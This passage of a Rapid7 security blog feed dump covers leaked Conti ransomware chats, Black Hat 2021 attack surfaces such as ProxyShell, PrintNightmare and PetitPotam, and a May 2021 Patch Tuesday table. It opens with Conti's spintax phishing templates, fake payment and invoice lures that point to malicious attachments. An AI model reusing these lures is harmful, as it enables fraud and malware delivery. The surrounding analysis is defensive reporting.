{discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-22T09:01:54", "description": "\n\nHere we are again with another installment of Patch Tuesday. When compared to the past few months this one feels a bit light both in severity and number of vulnerabilities addressed. Microsoft has only released patches for 55 CVEs this month, less than half of the usual volume, with only 4 of them being scored as critical. Let's dive into the details.\n\n## HTTP Protocol Stack Remote Code Execution Vulnerability - [[[CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31207>)](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>)](<https://blog.rapid7.com/p/a0284057-0a58-48f2-89f5-a9b1d04661c3/CVE-2021-31166>)\n\nThe hottest vulnerability this month is in the HTTP.sys library. If an attacker has network access to a webserver running on an unpatched asset they may be able to send a specially crafted packet which could result in RCE. This was found internally by Microsoft and has not yet been observed in the wild. However, it is only a matter of time before someone figures out how to craft that special packet and we start to see widespread use against Windows 10 and Windows Server machines. Rated at 9.8, this potentially wormable vulnerability should be a high priority for remediation.\n\n## Hyper-V Remote Code Execution - [CVE-2021-28476](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28476>)\n\nThere is some debate whether this vulnerability deserves its assigned 9.9 severity score. The limited details indicate that the most likely use of this bug is to cause a DoS on the Hyper-V host. This can cause a good amount of trouble for anyone running virtual machines but is not as damaging as the theoretical RCE this vulnerability could provide. In either case this is a good patch to put at the top of the todo-list.\n\n## Exchange Server Security Feature Bypass - [CVE-2021-31207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31207>)\n\nNot to be outdone, Exchange Server is back again with yet another patch. This one is not nearly as high profile as the recent vulnerability which saw widespread use, but still an important patch to apply given that Exchange Servers are almost always exposed to the internet. There are a few other less severe vulnerabilities this month for Exchange which were disclosed at Pwn2Own in April. We expect to see a continued focus on Exchange Server in the months to come.\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31936>) | Microsoft Accessibility Insights for Web Information Disclosure Vulnerability | No | No | 7.4 | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26419>) | Scripting Engine Memory Corruption Vulnerability | No | No | 7.5 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27068>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-31213](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31213>) | Visual Studio Code Remote Containers Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31211](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31211>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31214>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31204>) | .NET and Visual Studio Elevation of Privilege Vulnerability | No | Yes | 7.3 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31209](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31209>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-31207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31207>) | Microsoft Exchange Server Security Feature Bypass Vulnerability | No | Yes | 6.6 | Yes \n[CVE-2021-31198](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31198>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-31195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-28461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28461>) | Dynamics Finance and Operations Cross-site Scripting Vulnerability | No | No | 6.1 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26421](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26421>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-26422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26422>) | Skype for Business and Lync Remote Code Execution Vulnerability | No | No | 7.2 | No \n[CVE-2021-28478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28478>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-31172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31172>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 7.1 | No \n[CVE-2021-26418](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26418>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-28474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28474>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-31173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31173>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-31181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31181>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-31171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31171>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 4.1 | Yes \n[CVE-2021-31175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31175>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31176>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31177>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31179>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31178>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31180>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31174>) | Microsoft Excel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n## Open Source Software Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31200](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31200>) | Common Utilities Remote Code Execution Vulnerability | No | Yes | 7.2 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31187>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31205](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31205>) | Windows SMB Client Security Feature Bypass Vulnerability | No | No | 4.3 | Yes \n[CVE-2021-31191](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31191>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31192](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31192>) | Windows Media Foundation Core Remote Code Execution Vulnerability | No | No | 7.3 | No \n[CVE-2021-31170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31170>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31185>) | Windows Desktop Bridge Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-31165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31165>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31167>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31168>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31169>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31208](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31208>) | Windows Container Manager Service Elevation of Privilege 